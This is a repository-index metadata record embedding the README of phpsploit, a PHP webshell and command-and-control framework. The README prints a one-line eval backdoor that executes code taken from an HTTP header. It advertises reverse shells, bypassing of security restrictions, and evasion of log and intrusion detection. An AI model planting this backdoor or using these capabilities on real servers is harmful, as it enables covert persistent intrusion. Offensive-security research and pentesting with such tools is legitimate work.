{"id":13510871,"url":"https://github.com/nil0x42/phpsploit","last_synced_at":"2025-05-15T04:07:06.729Z","repository":{"id":17265114,"uuid":"20034746","full_name":"nil0x42/phpsploit","owner":"nil0x42","description":"Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor","archived":false,"fork":false,"pushed_at":"2024-05-06T13:49:14.000Z","size":3474,"stargazers_count":2325,"open_issues_count":26,"forks_count":452,"subscribers_count":104,"default_branch":"master","last_synced_at":"2025-04-14T05:56:19.930Z","etag":null,"topics":["advanced-persistent-threat","backdoor","blackhat","c2","command-and-control","hacking","hacking-framework","hacktool","persistence","php-backdoor","php-webshell","php-webshell-backdoor","post-exploitation","privilege-escalation","redteam","stealth","web-hacking","webshell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nil0x42.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"nil0x42","custom":["exdemia.com/donate-bitcoin","paypal.me/nil0x42"]}},"created_at":"2014-05-21T19:43:03.000Z","updated_at":"2025-04-12T13:29:45.000Z","dependencies_parsed_at":"2024-01-19T01:04:12.358Z","dependency_job_id":"e8f60ab3-e1b7-4a1f-8a0c-928f3af052eb","html_url":"https://github.com/nil0x42/phpsploit","commit_stats":null,"previous_names":[],"tags_count":10,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nil0x42%2Fphpsploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nil0x42","download_url":"https://codeload.github.com/nil0x42/phpsploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254270646,"owners_count":22042859,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["advanced-persistent-threat","backdoor","blackhat","c2","command-and-control","hacking","hacking-framework","hacktool","persistence","php-backdoor","php-webshell","php-webshell-backdoor","post-exploitation","privilege-escalation","redteam","stealth","web-hacking","webshell"],"created_at":"2024-08-01T02:01:57.295Z","updated_at":"2025-05-15T04:07:01.717Z","avatar_url":"https://github.com/nil0x42.png","language":"Python","readme":"\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit\" alt=\"master\"\u003e\n    \u003cimg src=\"data/img/logo.png\" alt=\"Master\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003ch3 align=\"center\"\u003e\n    Full-featured C2 framework which silently persists on \u003cbr\u003ewebserver via polymorphic PHP oneliner\n    \u003ca href=\"https://twitter.com/intent/tweet?text=PhpSploit%2C%20Full-featured%20C2%20framework%20which%20silently%20persists%20on%20webserver%20via%20polymorphic%20PHP%20oneliner%20-%20by%20@nil0x42\u0026url=https://github.com/nil0x42/phpsploit\"\u003e\n      \u003cimg src=\"https://img.shields.io/twitter/url?label=tweet\u0026logo=twitter\u0026style=social\u0026url=http%3A%2F%2F0\" alt=\"tweet\"\u003e\n    \u003c/a\u003e\n\u003c/h3\u003e\n\u003cbr\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit/actions/workflows/unit-tests.yml?query=branch%3Amaster\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/actions/workflow/status/nil0x42/phpsploit/unit-tests.yml?label=tests\u0026logo=githubactions\" alt=\"Unit Tests workflow\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit/network/dependencies#requirements.txt\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/dependabot-ok-aaf?logo=dependabot\u0026logoColor=aaf\" alt=\"Dependabot status\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://app.codacy.com/gh/nil0x42/phpsploit/dashboard\"\u003e\n    \u003cimg src=\"https://img.shields.io/codacy/grade/f8514058aec04ad98727c79701bc042a?logo=codacy\u0026logoColor=green\" alt=\"codacy code quality\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://github.com/nil0x42/phpsploit/actions/workflows/codeql-analysis.yml?query=branch%3Amaster\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/actions/workflow/status/nil0x42/phpsploit/codeql-analysis.yml?label=codeql\u0026logo=lgtm\u0026logoColor=ff0\u0026color=af8\" alt=\"CodeQL workflow\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://codecov.io/gh/nil0x42/phpsploit\"\u003e\n    \u003cimg src=\"https://img.shields.io/codecov/c/github/nil0x42/phpsploit?color=orange\u0026label=coverage\u0026logo=codecov\" alt=\"codecov coverage\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://codeclimate.com/github/nil0x42/phpsploit/maintainability\"\u003e\n    \u003cimg src=\"https://api.codeclimate.com/v1/badges/6986200c1729b4a70a40/maintainability\" alt=\"codeclimate maintainability\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://github.com/enaqx/awesome-pentest\"\u003e\n    \u003cimg src=\"https://awesome.re/mentioned-badge.svg\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://www.kali.org/tools/phpsploit/\"\u003e\n    \u003cimg src=\"https://img.shields.io/static/v1?label=Kali%20Linux\u0026message=packaged\u0026color=red\u0026logo=kalilinux\u0026logoColor=ff0\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://www.blackarch.org/webapp.html\"\u003e\n    \u003cimg src=\"https://img.shields.io/static/v1?label=BlackArch\u0026message=packaged\u0026color=red\u0026logo=archlinux\u0026logoColor=006\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://twitter.com/intent/follow?screen_name=nil0x42\" target=\"_blank\"\u003e\n    \u003cimg src=\"https://img.shields.io/twitter/follow/nil0x42.svg?logo=twitter\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n  \u003csub\u003e\n    Created by\n    \u003ca href=\"https://twitter.com/nil0x42\"\u003enil0x42\u003c/a\u003e and\n    \u003ca href=\"https://github.com/nil0x42/phpsploit#contributors\"\u003econtributors\u003c/a\u003e\n  \u003c/sub\u003e\n\u003c/div\u003e\n\n\u003cbr\u003e\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"data/img/demo.png\"\u003e\n\u003c/p\u003e\n\n\n#### Overview\n\nThe obfuscated communication is accomplished using HTTP headers under\nstandard client requests and web server's relative responses, tunneled\nthrough a tiny **polymorphic backdoor**:\n\n```php\n\u003c?php @eval($_SERVER['HTTP_PHPSPL01T']); ?\u003e\n```\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Quick Start\n\n```sh\ngit clone https://github.com/nil0x42/phpsploit\ncd phpsploit/\npip3 install -r requirements.txt\n./phpsploit --interactive --eval \"help help\"\n```\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Features\n\n-   **Efficient**: More than 20 plugins to automate privilege-escalation tasks\n    -   Run commands and browse filesystem, bypassing PHP security restrictions\n    -   Upload/Download files between client and target\n    -   Edit remote files through local text editor\n    -   Run SQL console on target system\n    -   Spawn reverse TCP shells\n\n-   **Stealth**: The framework is made by paranoids, for paranoids\n    -   Nearly invisible by log analysis and NIDS signature detection\n    -   Safe-mode and common _PHP security restrictions bypass_\n    -   Communications are hidden in HTTP Headers\n    -   Loaded payloads are obfuscated to _bypass NIDS_\n    -   http/https/socks4/socks5 **Proxy support**\n\n-   **Convenient**: A robust interface with many crucial features\n    -   Detailed help for any option (`help` command)\n    -   _Cross-platform_ on both client and server.\n    -   CLI supports auto-completion \u0026 multi-command\n    -   Session saving/loading feature \u0026 persistent history\n    -   Multi-request support for large payloads (such as uploads)\n    -   Provides a powerful, highly configurable settings engine\n    -   Each setting, such as user-agent has a _polymorphic mode_\n    -   Customisable environment variables for plugin interaction\n    -   Provides a complete plugin development API\n\n* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n#### Supported platforms (as attacker):\n\n-   GNU/Linux\n-   Mac OS X\n\n#### Supported platforms (as target):\n\n-   GNU/Linux\n-   BSD-like\n-   Mac OS X\n-   Windows NT\n\n## Contributors\n\n\u003c!-- [![](https://contrib.rocks/image?repo=nil0x42/phpsploit)](https://github.com/nil0x42/phpsploit/graphs/contributors) --\u003e\n\u003c!-- \u003cdetails\u003e --\u003e\n\u003c!-- \u003csummary\u003e\u003cb\u003e:trophy: All contributors\u003c/b\u003e\u003c/summary\u003e --\u003e\nThanks goes to these wonderful people:\n\u003c!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --\u003e\n\u003c!-- prettier-ignore-start --\u003e\n\u003c!-- markdownlint-disable --\u003e\n\u003ctable\u003e\n  \u003ctr\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://exdemia.com\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/3504393?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003enil0x42\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=nil0x42\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#infra-nil0x42\" title=\"Infrastructure (Hosting, Build-Tools, etc)\"\u003e🚇\u003c/a\u003e \u003ca href=\"#plugin-nil0x42\" title=\"Plugin/utility libraries\"\u003e🔌\u003c/a\u003e \u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=nil0x42\" title=\"Tests\"\u003e⚠️\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/shiney-wh\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/20907184?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eshiney-wh\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=shiney-wh\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#plugin-shiney-wh\" title=\"Plugin/utility libraries\"\u003e🔌\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://wapiflapi.github.io\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/1619783?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eWannes Rombouts\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=wapiflapi\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#maintenance-wapiflapi\" title=\"Maintenance\"\u003e🚧\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://yurilz.com\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/6031769?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eAmine Ben Asker\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=yurilaaziz\" title=\"Code\"\u003e💻\u003c/a\u003e \u003ca href=\"#maintenance-yurilaaziz\" title=\"Maintenance\"\u003e🚧\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://twitter.com/jnazario\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/5619153?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003ejose nazario\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/commits?author=paralax\" title=\"Documentation\"\u003e📖\u003c/a\u003e \u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Aparalax\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"http://wikisecure.net\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/156915?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eSujit Ghosal\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"#blog-sujit\" title=\"Blogposts\"\u003e📝\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/sohelzerdoumi\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/3418725?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eZerdoumi\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Asohelzerdoumi\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/tristandostaler\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/5489330?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003etristandostaler\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Atristandostaler\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/rohantarai\"\u003e\u003cimg src=\"https://avatars3.githubusercontent.com/u/16543074?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eRohan Tarai\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"https://github.com/nil0x42/phpsploit/issues?q=author%3Arohantarai\" title=\"Bug reports\"\u003e🐛\u003c/a\u003e\u003c/td\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://triop.se\"\u003e\u003cimg src=\"https://avatars1.githubusercontent.com/u/190150?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eJonas Lejon\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e\u003ca href=\"#blog-jonaslejon\" title=\"Blogposts\"\u003e📝\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\n\u003c!-- markdownlint-enable --\u003e\n\u003c!-- prettier-ignore-end --\u003e\n\u003c!-- ALL-CONTRIBUTORS-LIST:END --\u003e\nThis project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome\n\n\u003c!-- \u003c/details\u003e --\u003e\n","funding_links":["https://github.com/sponsors/nil0x42","exdemia.com/donate-bitcoin","paypal.me/nil0x42"],"categories":["Tools","Web","Python","\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing","Web Exploitation","Uncategorized","Python (1887)","backdoor"],"sub_categories":["Binary files examination and editing","Webshell","Scanning / Pentesting","\u003ca id=\"41ae40ed61ab2b61f2971fea3ec26e7c\"\u003e\u003c/a\u003e漏洞利用","Web shells and C2 frameworks","Uncategorized","Web Shells / C2 Frameworks"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnil0x42%2Fphpsploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnil0x42%2Fphpsploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnil0x42%2Fphpsploit/lists"}